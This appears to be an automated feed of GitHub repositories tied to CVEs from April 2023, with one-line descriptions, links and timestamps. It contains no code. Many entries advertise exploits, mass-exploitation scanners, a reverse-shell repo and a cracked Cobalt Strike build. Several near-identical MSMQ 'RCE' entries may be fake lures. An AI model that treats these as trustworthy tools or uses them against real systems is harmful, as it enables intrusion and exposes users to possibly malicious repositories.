**no description** : [zPrototype/CVE-2023-29983](https://github.com/zPrototype/CVE-2023-29983) create time: 2023-04-29T22:52:03Z

**PoC for CVE-2022-46169 that affects Cacti 1.2.22 version** : [devilgothies/CVE-2022-46169](https://github.com/devilgothies/CVE-2022-46169) create time: 2023-04-29T22:14:17Z

**Scanner CVE-2023-29489 Python (Selenium)** : [haxor1337x/Scanner-CVE-2023-29489](https://github.com/haxor1337x/Scanner-CVE-2023-29489) create time: 2023-04-29T18:52:37Z

**no description** : [Mostafa-Elguerdawi/CVE-2023-29489](https://github.com/Mostafa-Elguerdawi/CVE-2023-29489) create time: 2023-04-29T05:54:19Z

**no description** : [Mostafa-Elguerdawi/CVE-2023-29489.yaml](https://github.com/Mostafa-Elguerdawi/CVE-2023-29489.yaml) create time: 2023-04-29T05:52:53Z

**POC for Contact Form 7 < 5.3.2 - Unrestricted File Upload (Maybe Code execution )** : [bod4k/CVE-2020-35489](https://github.com/bod4k/CVE-2020-35489) create time: 2023-04-28T22:59:53Z

**OpenSSH 9.1 vulnerability mass scan and exploit** : [nhakobyan685/CVE-2023-25136](https://github.com/nhakobyan685/CVE-2023-25136) create time: 2023-04-28T19:46:03Z

**Proof of Concept repo to build a docker image that is vulnerable to CVE-2022-21449 for testing detection in azure defender** : [lmllr/java-vuln-scanning-test](https://github.com/lmllr/java-vuln-scanning-test) create time: 2023-04-27T15:13:40Z

**Exploit in python3 to explore CVE-2021-38314 in Redux Framework a wordpress plugin** : [0xGabe/CVE-2021-38314](https://github.com/0xGabe/CVE-2021-38314) create time: 2023-04-28T17:03:27Z

**a pyhton script to test all results from shodan for cPanel CVE-2023-29489, credits to @assetnote, I just automate** : [ipk1/CVE-2023-29489.py](https://github.com/ipk1/CVE-2023-29489.py) create time: 2023-04-28T16:56:36Z

**no description** : [jmrcsnchz/CVE-2023-30854](https://github.com/jmrcsnchz/CVE-2023-30854) create time: 2023-04-28T16:10:26Z

**nordugrid-arc-wn 6.14.0 DoS/LPE.** : [MaherAzzouzi/CVE-2023-31443](https://github.com/MaherAzzouzi/CVE-2023-31443) create time: 2023-04-28T14:17:34Z

**CVE-2020-14882 rewritten in PowerShell** : [H4shByte/CVE-2020-14882](https://github.com/H4shByte/CVE-2020-14882) create time: 2023-04-28T12:38:52Z

**This repository contains a python script that will handle the majority of the dompdf cached font exploit (CVE-2022-28368), all you need to do is create the request** : [That-Guy-Steve/CVE-2022-28368-handler](https://github.com/That-Guy-Steve/CVE-2022-28368-handler) create time: 2023-04-28T09:49:05Z

**Repository contains description for CVE-2023-31445** : [Dodge-MPTC/CVE-2023-31445-Unprivileged-Information-Disclosure](https://github.com/Dodge-MPTC/CVE-2023-31445-Unprivileged-Information-Disclosure) create time: 2023-04-28T07:37:13Z

**Cobalt Strike 4.4 猪猪版 去暗桩 去流量特征 beacon仿造真实API服务 修补CVE-2022-39197补丁** : [xiao-zhu-zhu/pig_CS4.4](https://github.com/xiao-zhu-zhu/pig_CS4.4) create time: 2023-04-28T06:31:38Z

**no description** : [xKore123/cPanel-CVE-2023-29489](https://github.com/xKore123/cPanel-CVE-2023-29489) create time: 2023-04-27T20:51:47Z

**PrestaShop <1.7.8.9 Fix for CVE-2023-30839** : [drkbcn/https-nvd.nist.gov-vuln-detail-CVE-2023-30839](https://github.com/drkbcn/https-nvd.nist.gov-vuln-detail-CVE-2023-30839) create time: 2023-04-27T11:49:13Z

**Apache Superset Auth Bypass Vulnerability CVE-2023-27524.** : [antx-code/CVE-2023-27524](https://github.com/antx-code/CVE-2023-27524) create time: 2023-04-27T07:31:40Z

**Apahce-Superset身份认证绕过漏洞(CVE-2023-27524)检测工具** : [Okaytc/Superset_auth_bypass_check](https://github.com/Okaytc/Superset_auth_bypass_check) create time: 2023-04-27T06:21:00Z

**CVE-2023-1671 POC in python** : [c4ln/CVE-2023-1671-POC](https://github.com/c4ln/CVE-2023-1671-POC) create time: 2023-04-27T04:31:44Z

**no description** : [natceil/cve-2022-42475](https://github.com/natceil/cve-2022-42475) create time: 2023-04-27T03:47:14Z

**Nuclei template for CVE-2023-29489** : [learnerboy88/CVE-2023-29489](https://github.com/learnerboy88/CVE-2023-29489) create time: 2023-04-27T03:30:24Z

**no description** : [elbiazo/CVE-2020-27786](https://github.com/elbiazo/CVE-2020-27786) create time: 2023-04-27T01:13:04Z

**A Python PoC of CVE-2022-21661, inspired from z92g's Go PoC** : [sealldeveloper/CVE-2022-21661-PoC](https://github.com/sealldeveloper/CVE-2022-21661-PoC) create time: 2023-04-27T00:36:16Z

**no description** : [sandumjacob/CVE-2023-2033-Analysis](https://github.com/sandumjacob/CVE-2023-2033-Analysis) create time: 2023-04-26T15:24:02Z

**PoC repository for CVE-2023-29007** : [ethiack/CVE-2023-29007](https://github.com/ethiack/CVE-2023-29007) create time: 2023-04-26T14:00:11Z

**A simple exploit that uses dirtypipe to inject shellcode into runC entrypoint to implement container escapes.** : [JlSakuya/CVE-2022-0847-container-escape](https://github.com/JlSakuya/CVE-2022-0847-container-escape) create time: 2023-04-26T13:37:14Z

**Exploit for Papercut CVE-2023-27350** : [adhikara13/CVE-2023-27350](https://github.com/adhikara13/CVE-2023-27350) create time: 2023-04-25T20:51:23Z

**no description** : [GrayHatZone/CVE-2022-37706-LPE-exploit](https://github.com/GrayHatZone/CVE-2022-37706-LPE-exploit) create time: 2023-04-25T19:28:32Z

**Reflected Cross Site Scripting (XSS) in Intermesh BV Group-Office version 6.6.145, allows attackers to gain escalated privileges and gain sensitive information via the GO_LANGUAGE cookie** : [brainkok/CVE-2023-25292](https://github.com/brainkok/CVE-2023-25292) create time: 2023-04-25T19:27:53Z

**Fix URL containing SPACES after Apache upgrade CVE-2023-25690** : [tbachvarova/linux-apache-fix-mod_rewrite-spaceInURL](https://github.com/tbachvarova/linux-apache-fix-mod_rewrite-spaceInURL) create time: 2023-04-25T17:15:54Z

**Check for CVE-2014-0160** : [cbk914/heartbleed-checker](https://github.com/cbk914/heartbleed-checker) create time: 2023-04-25T17:00:25Z

**CVE-2023-22621: SSTI to RCE by Exploiting Email Templates affecting Strapi Versions <=4.5.5** : [sofianeelhor/CVE-2023-22621-POC](https://github.com/sofianeelhor/CVE-2023-22621-POC) create time: 2023-04-25T15:50:05Z

**Sophos Web Appliance pre-auth command injection Vulnerability Scanner** : [behnamvanda/CVE-2023-1671](https://github.com/behnamvanda/CVE-2023-1671) create time: 2023-04-25T15:19:41Z

**Apache ShardingSphere ElasticJob-UI Privilege Escalation & RCE Exploit** : [Zeyad-Azima/CVE-2022-22733](https://github.com/Zeyad-Azima/CVE-2022-22733) create time: 2023-04-25T11:39:40Z

**Basic PoC for CVE-2023-27524: Insecure Default Configuration in Apache Superset** : [horizon3ai/CVE-2023-27524](https://github.com/horizon3ai/CVE-2023-27524) create time: 2023-04-25T04:59:05Z

**Perform With Mass Exploits WSO2** : [Pari-Malam/CVE-2022-29464](https://github.com/Pari-Malam/CVE-2022-29464) create time: 2023-04-25T09:45:18Z

**no description** : [qafdevsec/CVE-2019-9081_PoC](https://github.com/qafdevsec/CVE-2019-9081_PoC) create time: 2023-04-25T09:07:39Z

**Quick Review about the SQL-Injection in the NEX-Forms Plugin for WordPress** : [SchmidAlex/nex-forms_SQL-Injection-CVE-2023-2114](https://github.com/SchmidAlex/nex-forms_SQL-Injection-CVE-2023-2114) create time: 2023-04-05T11:42:27Z

**UnrealIRCD 3.2.8.1 backdoor command execution exploit in Python 3 (CVE-2010-2075).** : [chancej715/UnrealIRCD-3.2.8.1-Backdoor-Command-Execution](https://github.com/chancej715/UnrealIRCD-3.2.8.1-Backdoor-Command-Execution) create time: 2023-04-25T04:30:36Z

**no description** : [iceberg-N/cve-2021-26855](https://github.com/iceberg-N/cve-2021-26855) create time: 2023-04-25T04:29:35Z

**CVE-2022-33959 - 602 Client-Side Enforcement of Server-Side Security (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N)** : [gitadvisor/CVE-2022-33959](https://github.com/gitadvisor/CVE-2022-33959) create time: 2023-04-25T04:31:17Z

**CVE-2023-22894** : [Saboor-Hakimi/CVE-2023-22894](https://github.com/Saboor-Hakimi/CVE-2023-22894) create time: 2023-04-24T23:26:13Z

**Apache Tika-server < 1.18 - Command Injection** : [Zebra64/CVE-2018-1335](https://github.com/Zebra64/CVE-2018-1335) create time: 2023-04-24T15:31:57Z

**CVE-2023-1671-POC, based on dnslog platform** : [W01fh4cker/CVE-2023-1671-POC](https://github.com/W01fh4cker/CVE-2023-1671-POC) create time: 2023-04-24T15:53:42Z

**Proof of Concept Exploit for PaperCut CVE-2023-27350** : [horizon3ai/CVE-2023-27350](https://github.com/horizon3ai/CVE-2023-27350) create time: 2023-04-22T21:34:06Z

**no description** : [Trinadh465/Openssl-1.1.1g_CVE-2022-4304](https://github.com/Trinadh465/Openssl-1.1.1g_CVE-2022-4304) create time: 2023-04-24T07:15:33Z

**no description** : [Trinadh465/Openssl_1.1.1g_CVE-2023-0464](https://github.com/Trinadh465/Openssl_1.1.1g_CVE-2023-0464) create time: 2023-04-24T06:40:37Z

**no description** : [nidhi7598/OPENSSL_1.1.1g_G3_CVE-2022-4450](https://github.com/nidhi7598/OPENSSL_1.1.1g_G3_CVE-2022-4450) create time: 2023-04-24T05:55:40Z

**no description** : [nidhi7598/OPENSSL_1.1.1g_G3_CVE-2023-0215](https://github.com/nidhi7598/OPENSSL_1.1.1g_G3_CVE-2023-0215) create time: 2023-04-24T05:35:43Z

**no description** : [andyhsu024/CVE-2021-29447](https://github.com/andyhsu024/CVE-2021-29447) create time: 2023-04-24T01:33:22Z

**7000多个cve,包含1999-2023基本所有cve!** : [clearcdq/cve_poc](https://github.com/clearcdq/cve_poc) create time: 2023-04-24T02:28:48Z

**D-Link DNR-322L - Authenticated Remote Code Execution** : [rtfmkiesel/CVE-2022-40799](https://github.com/rtfmkiesel/CVE-2022-40799) create time: 2023-04-23T20:42:18Z

**Proof of concept.** : [NigmaZ/CVE-2017-7308](https://github.com/NigmaZ/CVE-2017-7308) create time: 2023-04-23T10:56:21Z

**Pre-Auth RCE in Sophos Web Appliance** : [ohnonoyesyes/CVE-2023-1671](https://github.com/ohnonoyesyes/CVE-2023-1671) create time: 2023-04-23T02:58:17Z

**no description** : [d34dun1c02n/CVE-2023-30458](https://github.com/d34dun1c02n/CVE-2023-30458) create time: 2023-04-15T18:27:42Z

**Exploit for CVE-2022-1609 WordPress Weblizar Backdoor.** : [realsiao/cve-2022-1609-exploit](https://github.com/realsiao/cve-2022-1609-exploit) create time: 2023-04-22T12:51:09Z

**「💥」CVE-2022-4944: KodExplorer <= 4.49 - CSRF to Arbitrary File Upload** : [MrEmpy/CVE-2022-4944](https://github.com/MrEmpy/CVE-2022-4944) create time: 2023-04-21T15:09:37Z

**no description** : [TamingSariMY/CVE-2023-27350-POC](https://github.com/TamingSariMY/CVE-2023-27350-POC) create time: 2023-04-21T20:13:47Z

**no description** : [Anonimo501/ssh_enum_users_CVE-2018-15473](https://github.com/Anonimo501/ssh_enum_users_CVE-2018-15473) create time: 2023-04-21T13:16:29Z

**no description** : [ZZY3312/CVE-2023-28206](https://github.com/ZZY3312/CVE-2023-28206) create time: 2023-04-21T12:08:59Z

**A simple python script to check if a service is vulnerable** : [MaanVader/CVE-2023-27350-POC](https://github.com/MaanVader/CVE-2023-27350-POC) create time: 2023-04-21T09:19:13Z

**CVE-2023-1454,Jeecg-Boot 前台SQL注入,CVE-2023-1454批量检测** : [padbergpete47/CVE-2023-1454](https://github.com/padbergpete47/CVE-2023-1454) create time: 2023-04-21T09:27:45Z

**no description** : [dishfwk/CVE-2022-21882](https://github.com/dishfwk/CVE-2022-21882) create time: 2023-04-21T06:14:06Z

**A little demonstration of cve-2021-41773 on httpd docker containers** : [MatanelGordon/docker-cve-2021-41773](https://github.com/MatanelGordon/docker-cve-2021-41773) create time: 2023-04-20T22:37:06Z

**no description** : [wlswotmd/CVE-2022-0435](https://github.com/wlswotmd/CVE-2022-0435) create time: 2023-04-20T17:29:02Z

**metasploit module for CVE-2023-21554 remote code execution in msmq service which dont require any authentication and user interaction** : [g3tS3rvic3s/CVE-2023-21554-RCE-POC](https://github.com/g3tS3rvic3s/CVE-2023-21554-RCE-POC) create time: 2023-04-20T17:58:25Z

**CVE-2023-21554 unauthenticated RCE in Microsoft Message Queuing (MSMQ) aka QueueJumper** : [g1x-r/CVE-2023-21554-PoC](https://github.com/g1x-r/CVE-2023-21554-PoC) create time: 2023-04-20T13:38:46Z

**CVE-2023-21823 PoC** : [Elizarfish/CVE-2023-21823](https://github.com/Elizarfish/CVE-2023-21823) create time: 2023-04-20T11:26:48Z

**no description** : [zoemurmure/CVE-2023-21768-AFD-for-WinSock-EoP-exploit](https://github.com/zoemurmure/CVE-2023-21768-AFD-for-WinSock-EoP-exploit) create time: 2023-04-20T08:26:42Z

**no description** : [FzBacon/CVE-2023-25234_Tenda_AC6_stack_overflow](https://github.com/FzBacon/CVE-2023-25234_Tenda_AC6_stack_overflow) create time: 2023-04-11T11:36:48Z

**CVE-2020-17453 is a powerful scanner for bug bounty hunters and penetration testers to discover vulnerabilities in their web applications.** : [karthi-the-hacker/CVE-2020-17453](https://github.com/karthi-the-hacker/CVE-2020-17453) create time: 2023-04-20T06:00:13Z

**All CVE 2023 in Github** : [RootKRD/CVE-2023](https://github.com/RootKRD/CVE-2023) create time: 2023-04-20T00:55:46Z

**Create CVE_2020_3992 Poc && exp** : [ceciliaaii/CVE_2020_3992](https://github.com/ceciliaaii/CVE_2020_3992) create time: 2023-04-19T14:49:43Z

**CVE-2023-21554 unauthenticated RCE in Microsoft Message Queuing (MSMQ)/QueueJumper** : [C3r7/CVE-2023-21554-RCE](https://github.com/C3r7/CVE-2023-21554-RCE) create time: 2023-04-19T13:21:17Z

**CVE-2022-4896 PoCs & exploits** : [sapellaniz/CVE-2022-4896](https://github.com/sapellaniz/CVE-2022-4896) create time: 2023-04-19T12:53:03Z

**CVE-2022-48474 &CVE-2022-48475 PoCs & exploits** : [sapellaniz/CVE-2022-48474_CVE-2022-48475](https://github.com/sapellaniz/CVE-2022-48474_CVE-2022-48475) create time: 2023-04-19T12:27:52Z

**no description** : [weizman/CVE-2023-1767](https://github.com/weizman/CVE-2023-1767) create time: 2023-03-15T12:16:20Z

**CVE-2021-31589 is a powerful scanner for bug bounty hunters and penetration testers to discover vulnerabilities in their web applications.** : [karthi-the-hacker/CVE-2021-31589](https://github.com/karthi-the-hacker/CVE-2021-31589) create time: 2023-04-19T09:10:40Z

**OpenSSH Pre-Auth Double Free CVE-2023-25136 POC** : [adhikara13/CVE-2023-25136](https://github.com/adhikara13/CVE-2023-25136) create time: 2023-04-18T21:47:47Z

**Windows Message Queuing vulnerability exploitation with custom payloads** : [Hashi0x/PoC-CVE-2023-21554](https://github.com/Hashi0x/PoC-CVE-2023-21554) create time: 2023-04-18T15:42:33Z

**CVE-2023-21554 unauthenticated RCE in Microsoft Message Queuing (MSMQ) aka QueueJumper** : [b4rt0xx/CVE-2023-21554-POC](https://github.com/b4rt0xx/CVE-2023-21554-POC) create time: 2023-04-18T15:30:17Z

**no description** : [Dima2021/cve-2022-42889-text4shell](https://github.com/Dima2021/cve-2022-42889-text4shell) create time: 2023-04-18T14:49:45Z

**no description** : [nidhi7598/OPENSSL_1.0.2_G2.5_CVE-2023-0215](https://github.com/nidhi7598/OPENSSL_1.0.2_G2.5_CVE-2023-0215) create time: 2023-04-18T12:07:40Z

**no description** : [FzBacon/CVE-2023-27216_D-Link_DSL-3782_Router_command_injection](https://github.com/FzBacon/CVE-2023-27216_D-Link_DSL-3782_Router_command_injection) create time: 2023-04-18T10:45:42Z

**no description** : [FzBacon/CVE-2022-34527_D-Link_DSL-3782_Router_command_injection](https://github.com/FzBacon/CVE-2022-34527_D-Link_DSL-3782_Router_command_injection) create time: 2023-04-18T04:26:49Z

**CVE-2023-21554 unauthenticated RCE in Microsoft Message Queuing (MSMQ)/QueueJumper** : [C00k3rbkr/CVE-2023-21554-RCE](https://github.com/C00k3rbkr/CVE-2023-21554-RCE) create time: 2023-04-17T16:43:00Z

**no description** : [randallbanner/Spring-Cloud-Function-Vulnerability-CVE-2022-22963-RCE](https://github.com/randallbanner/Spring-Cloud-Function-Vulnerability-CVE-2022-22963-RCE) create time: 2023-04-17T13:54:06Z

**CVE-2023-21554 unauthenticated RCE in Microsoft Message Queuing (MSMQ) aka QueueJumper** : [10xeye/CVE-2023-21554-POC](https://github.com/10xeye/CVE-2023-21554-POC) create time: 2023-04-17T12:22:56Z

**Command injection in ManageEngine ADManager Plus** : [ohnonoyesyes/CVE-2023-29084](https://github.com/ohnonoyesyes/CVE-2023-29084) create time: 2023-04-17T01:32:29Z

**Reproduce CVE-2023-2033** : [insoxin/CVE-2023-2033](https://github.com/insoxin/CVE-2023-2033) create time: 2023-04-17T00:25:16Z

**POC : CVE-2023-21716 Microsoft Word RTF Font Table Heap Corruption** : [JMousqueton/CVE-2023-21716](https://github.com/JMousqueton/CVE-2023-21716) create time: 2023-04-16T21:12:29Z

**Linux Bluetooth - Run arbitrary management commands as an unprivileged user** : [lrh2000/CVE-2023-2002](https://github.com/lrh2000/CVE-2023-2002) create time: 2023-04-16T10:05:13Z

**I do some tweaking for iOS from 16.0 to 16.1.2 based on MacDirtyCow (CVE-2022-46689) exploit.** : [tdquang266/MDC](https://github.com/tdquang266/MDC) create time: 2023-04-16T03:33:38Z

**💣💥💀 Пример запуска fork-бомбы на удаленном сервере благодаря уязвимости CVE-2018-3149** : [funcid/log4j-exploit-with-fork-bomb](https://github.com/funcid/log4j-exploit-with-fork-bomb) create time: 2023-04-15T12:47:39Z

**CVE-2023-21554 unauthenticated RCE in Microsoft Message Queuing (MSMQ)/QueueJumper** : [durte/CVE-2023-21554-RCE](https://github.com/durte/CVE-2023-21554-RCE) create time: 2023-04-15T11:05:55Z

**no description** : [houqe/EXP_CVE-2018-19518](https://github.com/houqe/EXP_CVE-2018-19518) create time: 2023-04-15T09:31:45Z

**no description** : [houqe/POC_CVE-2023-21839](https://github.com/houqe/POC_CVE-2023-21839) create time: 2023-04-15T08:57:10Z

**no description** : [yrtsec/CVE-2023-123456](https://github.com/yrtsec/CVE-2023-123456) create time: 2023-04-15T06:39:20Z

**no description** : [yrtsec/CVE-2023-999991_2](https://github.com/yrtsec/CVE-2023-999991_2) create time: 2023-04-15T06:29:47Z

**no description** : [houqe/POC_CVE-2023-21839](https://github.com/houqe/POC_CVE-2023-21839) create time: 2023-04-15T06:19:58Z

**Exploit Swagger UI - User Interface (UI) Misrepresentation of Critical Information (CVE-2018-25031)** : [rafaelcintralopes/SwaggerUI-CVE-2018-25031](https://github.com/rafaelcintralopes/SwaggerUI-CVE-2018-25031) create time: 2023-04-14T19:48:29Z

**Proof of Concept for Windows Message Queuing also known as CVE-2023-21554** : [xhshes/CVE-2023-21554-QueueJumper](https://github.com/xhshes/CVE-2023-21554-QueueJumper) create time: 2023-04-14T19:42:50Z

**no description** : [zeroch1ll/cve-2021-29447](https://github.com/zeroch1ll/cve-2021-29447) create time: 2023-04-14T18:22:14Z

**no description** : [YSaxon/CVE-2023-28615](https://github.com/YSaxon/CVE-2023-28615) create time: 2023-04-14T15:41:12Z

**no description** : [dsn1321/KB5025175-CVE-2022-41099](https://github.com/dsn1321/KB5025175-CVE-2022-41099) create time: 2023-04-14T12:48:39Z

**CVE-2023-21554 unauthenticated RCE in Microsoft Message Queuing (MSMQ)/QueueJumper** : [tonarni/CVE-2023-21554-RCE](https://github.com/tonarni/CVE-2023-21554-RCE) create time: 2023-04-14T12:47:04Z

**RCE Module for the Windows Message Queuing vulnerability** : [00hshmakr/CVE-2023-21554](https://github.com/00hshmakr/CVE-2023-21554) create time: 2023-04-14T11:34:33Z

**no description** : [rissor41/SolarWinds-CVE-2021-35250](https://github.com/rissor41/SolarWinds-CVE-2021-35250) create time: 2023-04-13T05:13:38Z

**CVE-2023-21554 unauthenticated RCE in Microsoft Message Queuing (MSMQ) aka QueueJumper** : [checksec0xint/CVE-2023-21554-PoC](https://github.com/checksec0xint/CVE-2023-21554-PoC) create time: 2023-04-14T05:14:49Z

**A code injection vulnerability in the User Portal and Web Admin Portal allows a remote attacker to execute code in a Sophos Firewall.** : [Sophos-PSIRT-REPO/CVE-2022-3236](https://github.com/Sophos-PSIRT-REPO/CVE-2022-3236) create time: 2023-04-12T23:55:33Z

**An integer overflow in WatchGuard Firebox and XTM appliances allows an unauthenticated remote attacker to trigger a buffer overflow and potentially execute arbitrary code by sending a malicious request to exposed management ports...** : [Watchguard-PSIRT-REPO/CVE-2022-31789](https://github.com/Watchguard-PSIRT-REPO/CVE-2022-31789) create time: 2023-04-12T20:49:54Z

**A critical TEXT4SHELL Apache vulnerability in SonicWall interfaces may allow a remote unauthenticated attacker to execute arbitrary code and take full control of the impacted Product...** : [Sonicwall-PSIRT-REPO/CVE-2022-42889](https://github.com/Sonicwall-PSIRT-REPO/CVE-2022-42889) create time: 2023-04-12T20:49:27Z

**An authentication bypass vulnerability in the Palo Alto Networks web interface allows a network-based attacker to impersonate an existing PAN-OS administrator and perform privileged actions...** : [PaloAlto-PSIRT-REPO/CVE-2022-0030](https://github.com/PaloAlto-PSIRT-REPO/CVE-2022-0030) create time: 2023-04-12T20:48:45Z

**A critical vulnerability in the authentication and authorization flows for VPN connections in Cisco Adaptive Security Appliance (ASA) Software and Firepower Threat Defense (FTD) Software allows an unauthenticated, remote attacker to establish a connection as a different user...** : [Cisco-PSIRT-Repo/CVE-2022-20928](https://github.com/Cisco-PSIRT-Repo/CVE-2022-20928) create time: 2023-04-12T20:47:59Z

**A critical buffer underwrite ('buffer underflow') vulnerability in FortiOS & FortiProxy interfaces may allow a remote unauthenticated attacker to execute arbitrary code and take full control of the impacted Product...** : [FortiSecurity/CVE-2023-25610](https://github.com/FortiSecurity/CVE-2023-25610) create time: 2023-03-30T23:39:19Z

**CVE-2023-1454漏洞检测脚本** : [BugFor-Pings/CVE-2023-1454-POC](https://github.com/BugFor-Pings/CVE-2023-1454-POC) create time: 2023-04-13T19:56:47Z

**Remote Code Execution module for the recent vulnerability in Windows MSMQ** : [HshMkr/CVE-2023-21554](https://github.com/HshMkr/CVE-2023-21554) create time: 2023-04-13T17:26:04Z

**F5 BIG-IP Exploit Using CVE-2022-1388 and CVE-2022-41800** : [j-baines/tippa-my-tongue](https://github.com/j-baines/tippa-my-tongue) create time: 2023-04-12T20:46:03Z

**CVE-2022-38181 POC for FireTV 3rd gen Cube (gazelle)** : [Pro-me3us/CVE_2022_38181_Gazelle](https://github.com/Pro-me3us/CVE_2022_38181_Gazelle) create time: 2023-04-13T13:25:09Z

**CVE-2022-38181 POC for FireTV 2nd gen Cube (raven)** : [Pro-me3us/CVE_2022_38181_Raven](https://github.com/Pro-me3us/CVE_2022_38181_Raven) create time: 2023-04-13T13:19:04Z

**CVE-2023-21554 unauthenticated RCE in Microsoft Message Queuing (MSMQ) aka QueueJumper** : [select275/CVE-2023-21554-PoC](https://github.com/select275/CVE-2023-21554-PoC) create time: 2023-04-13T14:11:10Z

**Fixed exploit for CVE-2022-46169 (originally from https://www.exploit-db.com/exploits/51166)** : [icebreack/CVE-2022-46169](https://github.com/icebreack/CVE-2022-46169) create time: 2023-04-13T08:55:08Z

**no description** : [CHINA-china/MinIO_CVE-2023-28432_EXP](https://github.com/CHINA-china/MinIO_CVE-2023-28432_EXP) create time: 2023-04-13T08:36:52Z

**CVE-2023-1454 jeecg-boot Unauthorized SQL injection vulnerability** : [CKevens/CVE-2023-1454-EXP](https://github.com/CKevens/CVE-2023-1454-EXP) create time: 2023-04-13T04:51:41Z

**no description** : [hh-hunter/ml-CVE-2023-1177](https://github.com/hh-hunter/ml-CVE-2023-1177) create time: 2023-04-13T02:56:24Z

**PoC for the MSMQ vulnerability recently discovered also known as CVE-2023-21554** : [hash0x1/CVE-2023-21554](https://github.com/hash0x1/CVE-2023-21554) create time: 2023-04-12T22:36:29Z

**Proof-of-Concept for CVE-2023-21554 vulnerability recently discovered in Windows MSMQ** : [00hashmaker/CVE-2023-21554-0day](https://github.com/00hashmaker/CVE-2023-21554-0day) create time: 2023-04-12T21:46:13Z

**BlackVue DR750 CVE CVE-2023-27746 CVE-2023-27747 CVE-2023-27748** : [eyJhb/blackvue-cve-2023](https://github.com/eyJhb/blackvue-cve-2023) create time: 2023-02-28T16:37:33Z

**no description** : [Guest-user1/CVE-2018-6574](https://github.com/Guest-user1/CVE-2018-6574) create time: 2023-04-12T09:45:08Z

**no description** : [khuntor/CVE-2021-43858-MinIO](https://github.com/khuntor/CVE-2021-43858-MinIO) create time: 2023-04-12T07:34:03Z

**no description** : [Trinadh465/external_expat-2.1.0_CVE-2022-25313](https://github.com/Trinadh465/external_expat-2.1.0_CVE-2022-25313) create time: 2023-04-12T05:30:46Z

**RADIANCE is an exploit for CVE-2023-23752** : [equationsoftworks/Radiance](https://github.com/equationsoftworks/Radiance) create time: 2023-04-12T05:59:18Z

**Public repo for anything CVE-2022-21894** : [qjawls2003/BlackLotus-Detection](https://github.com/qjawls2003/BlackLotus-Detection) create time: 2023-04-12T05:01:50Z

**no description** : [nidhi7598/expat_2.1.0_G2_CVE-2022-25313](https://github.com/nidhi7598/expat_2.1.0_G2_CVE-2022-25313) create time: 2023-04-12T04:51:25Z

**Created to help detect IOCs for CVE-2022-21894: The BlackLotus campaign** : [bakedmuffinman/BlackLotusDetection](https://github.com/bakedmuffinman/BlackLotusDetection) create time: 2023-04-12T04:05:42Z

**no description** : [PYTERSELAPHIELDRACO777999/CVEEXPLOIT202230525](https://github.com/PYTERSELAPHIELDRACO777999/CVEEXPLOIT202230525) create time: 2023-04-11T14:49:55Z

**no description** : [Trinadh465/external_expat-2.1.0_CVE-2022-25313](https://github.com/Trinadh465/external_expat-2.1.0_CVE-2022-25313) create time: 2023-04-11T12:54:01Z

**no description** : [FzBacon/CVE-2019-18370_XiaoMi_Mi_WIFI_RCE_analysis](https://github.com/FzBacon/CVE-2019-18370_XiaoMi_Mi_WIFI_RCE_analysis) create time: 2023-04-11T10:58:30Z

**CVE-2023-30459** : [Toxich4/CVE-2023-30459](https://github.com/Toxich4/CVE-2023-30459) create time: 2023-04-11T11:11:29Z

**no description** : [FzBacon/CVE-2023-26976_tenda_AC6_stack_overflow](https://github.com/FzBacon/CVE-2023-26976_tenda_AC6_stack_overflow) create time: 2023-04-11T11:02:48Z

**no description** : [nik0nz7/CVE-2020-14882](https://github.com/nik0nz7/CVE-2020-14882) create time: 2023-04-11T08:38:47Z

**Textpattern v4.8.8 and Below are vulnerable to Unrestricted File Upload Leading to Remote Code Execution** : [leekenghwa/CVE-2023-26852-Textpattern-v4.8.8-and-](https://github.com/leekenghwa/CVE-2023-26852-Textpattern-v4.8.8-and-) create time: 2023-04-11T07:00:04Z

**CVE-2023-27704 Void Tools Everything lower than v1.4.1.1022 was discovered to contain a Regular Expression Denial of Service (ReDoS)** : [happy0717/CVE-2023-27704](https://github.com/happy0717/CVE-2023-27704) create time: 2023-04-11T06:41:58Z

**CVE-2023-27703 An Android version of pikpak version V1.29.2 element debugging interface leakage vulnerability** : [happy0717/CVE-2023-27703](https://github.com/happy0717/CVE-2023-27703) create time: 2023-04-11T06:24:04Z

**There are 2 exploitation methods that exploit CVE-2022-27666. For more info on how to use these code bases please check my blog.** : [Albocoder/cve-2022-27666-exploits](https://github.com/Albocoder/cve-2022-27666-exploits) create time: 2023-04-11T00:12:33Z

**no description** : [Kaneki-hash/CVE-2023-29017-reverse-shell](https://github.com/Kaneki-hash/CVE-2023-29017-reverse-shell) create time: 2023-04-10T15:33:54Z

**no description** : [SourM1lk/CVE-2022-22963-Exploit](https://github.com/SourM1lk/CVE-2022-22963-Exploit) create time: 2023-04-10T14:12:58Z

**Yetishare SQL Injection in sSortDir_0 parameter - v3.5.2 - v4.5.4. Apart from an admin being able to exploit this, it could also be used in a CSRF attack to trick an admin user into running malicious queries.** : [cve-vuln/CVE-2019-20059](https://github.com/cve-vuln/CVE-2019-20059) create time: 2020-03-04T17:41:52Z

**CVE-2023-30459** : [Toxich4/CVE-2023-30459](https://github.com/Toxich4/CVE-2023-30459) create time: 2023-04-10T12:18:41Z

**no description** : [YuanRuQian/CVE-2021-44228-attack-demo](https://github.com/YuanRuQian/CVE-2021-44228-attack-demo) create time: 2023-04-09T23:10:57Z

**Test environments for CVE-2023-28432, information disclosure in MinIO clusters** : [h0ng10/CVE-2023-28432_docker](https://github.com/h0ng10/CVE-2023-28432_docker) create time: 2023-04-09T20:28:33Z

**Perform with Dork Scanner and Massive with Joomla 4.2.8** : [Pari-Malam/DorkerW-CVE-2023-23752](https://github.com/Pari-Malam/DorkerW-CVE-2023-23752) create time: 2023-04-09T13:20:48Z

**In Paradox Security System IPR512 Web console login form page, attacker can input JavaScript string, such as "" that will overwrite configurations in the file "login.xml" and cause the login page to crash.** : [SlashXzerozero/Injection-vulnerability-in-Paradox-Security-Systems-IPR512-CVE-2023-24709-PoC](https://github.com/SlashXzerozero/Injection-vulnerability-in-Paradox-Security-Systems-IPR512-CVE-2023-24709-PoC) create time: 2023-01-26T12:13:51Z

**no description** : [dgor2023/cve-2022-42889-text4shell-docker](https://github.com/dgor2023/cve-2022-42889-text4shell-docker) create time: 2023-04-09T04:09:34Z

**A study of malicious CVE proof of concept exploits in GitHub (2022)** : [JoanaTrashlieva/cve-poc-exploits-2022](https://github.com/JoanaTrashlieva/cve-poc-exploits-2022) create time: 2023-04-08T17:48:00Z

**no description** : [vnc1106/CVE-2022-2602](https://github.com/vnc1106/CVE-2022-2602) create time: 2023-04-08T16:50:23Z

